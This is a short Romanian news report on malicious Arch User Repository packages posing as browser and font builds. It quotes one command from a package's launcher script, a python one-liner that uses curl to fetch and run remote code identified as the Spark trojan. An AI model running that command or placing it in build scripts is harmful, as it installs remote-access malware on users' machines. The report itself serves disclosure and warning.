În depozitul AUR (Arch User Repository), folosit în Arch Linux pentru distribuirea pachetelor de către dezvoltatori terți, a continuat publicarea codului malitios, integrat în pachetele cu compilări neoficiale ale browserelor. Pe lângă pachetele malitioase identificate acum două săptămâni, firefox-patch-bin, librewolf-fix-bin și zen-browser-patched-bin, a fost adăugat în AUR pachetul google-chrome-stable, care conține, de asemenea, o modificare ce instalează un component malitios, oferind acces la distanță la sistem.
În fișierul PKGBUILD al pachetului problematic a fost identificată instalarea unui script pentru a rula browserul google-chrome-stable.sh, care includea printre altele comanda ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, care descărca un malware recunoscut de serviciul VirusTotal ca troianul Spark, permițând gestionarea de la distanță a sistemului, lansarea de procese, transferul de fișiere, inspectarea traficului și trimiterea de capturi de ecran.
Pachetul malitios google-chrome-stable a fost încărcat alaltăieri și a fost șters de către administratorii AUR la câteva ore după apariție. Aproape imediat după ștergerea google-chrome-stable, în AUR au fost încărcate două pachete malitioase - „chrome” și „chrome-bin”, conținând un script de instalare similar al malware-ului pe sistemul utilizatorului.
Apoi au fost descoperite încă trei pachete cu cod malitios: ttf-mac-fonts-all, ttf-ms-fonts-all și gromit.
Sursa: opennet.ro
